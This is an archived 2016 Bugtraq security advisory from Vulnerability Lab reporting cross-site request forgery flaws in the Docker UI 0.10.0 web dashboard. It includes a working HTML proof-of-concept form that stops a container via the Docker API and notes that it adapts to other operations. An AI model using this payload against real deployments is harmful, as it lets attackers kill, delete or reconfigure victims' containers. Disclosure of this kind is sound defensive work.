lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 31 Mar 2016 13:46:03 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: bugtraq@...urityfocus.com, bugs@...uritytracker.com
Subject: Docker UI v0.10.0 - Multiple Client Side Cross Site Request Forgery
 Web Vulnerabilities

Document Title:
===============
Docker UI v0.10.0 - Multiple Client Side Cross Site Request Forgery Web
Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1802


Release Date:
=============
2016-03-28


Vulnerability Laboratory ID (VL-ID):
====================================
1802


Common Vulnerability Scoring System:
====================================
2.9


Product & Service Introduction:
===============================
DockerUI is a web interface for the Docker Remote API. The goal is to
provide a pure client side implementation so it
is effortless to connect and manage docker. This project is not complete
and is still under heavy development.

(Copy of the Vendor Homepage: https://hub.docker.com/r/dockerui/dockerui/ )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple
client-side cross site request forgery vulnerabilities in the official
Docker UI web-application.


Vulnerability Disclosure Timeline:
==================================
2016-03-28: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Docker Inc
Product: Docker UI - Dashboard (Web-Application) 0.10.0


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
The marked repo is vulnerable to a CSRF attack meaning that if an
loggedin user can be tricked to visit a crafted URL created
by attacker (via spear   phishing/social engineering)/ by making admin
user visit his crafted webpage, the attacker can
do almost anything the admin user could typically do like killing  
containers, deleting etc, adding volumes, deleting etc.
adding networks,deleting etc. This vulnerability is present across all
the state changing operations across the Repo.


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without
privileged web-application user account and with low or medium user
interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.

PoC:
  <html>
  <body>
    <form
action="http://127.0.0.1:9000/dockerapi/containers/containerID/stop?t=5"
method="POST" enctype="text/plain">
      <input type="hidden"
name="&#123;&quot;id&quot;&#58;&quot;ContainerID&quot;&#125;" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
  </html>

Note: You can use the following exploit code to exploit the
vulnerability. For testing - you can just save it as .html and then
get it clicked with an logged in user and see exploit in action (t=5 can
be replaced with any other operation as required and
ContainerID is the only one to be customized in the below exploit code).


Security Risk:
==============
The security risk of the client-side cross site request forgery
vulnerabilities is estimated as medium. (CVSS 2.9)


Credits & Authors:
==================
Manideep K. - http://www.vulnerability-lab.com/show.php?user=Manideep%20K.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied,
including the warranties of merchantability and capability for a
particular purpose. Vulnerability-Lab or its suppliers are not liable in
any case of damage,
including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers
have been advised
of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental
damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to
break any licenses, policies, deface websites, hack into databases or
trade with stolen data.

Domains:    www.vulnerability-lab.com         - www.vuln-lab.com        
                - www.evolution-sec.com
Contact:    admin@...nerability-lab.com     -
research@...nerability-lab.com                 - admin@...lution-sec.com
Section:    magazine.vulnerability-lab.com     -
vulnerability-lab.com/contact.php                 -
evolution-sec.com/contact
Social:        twitter.com/vuln_lab        -
facebook.com/VulnerabilityLab                 -
youtube.com/user/vulnerability0lab
Feeds:        vulnerability-lab.com/rss/rss.php     -
vulnerability-lab.com/rss/rss_upcoming.php             -
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php     -
vulnerability-lab.com/list-of-bug-bounty-programs.php     -
vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory. Permission to
electronically
redistribute this alert in its unmodified form is granted. All other
rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team
& the specific
authors or managers. To record, list, modify, use or edit our material
contact (admin@ or research@...nerability-lab.com) to get a ask permission.

                    Copyright © 2016 | Vulnerability Laboratory -
[Evolution Security GmbH]™





-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@...nerability-lab.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ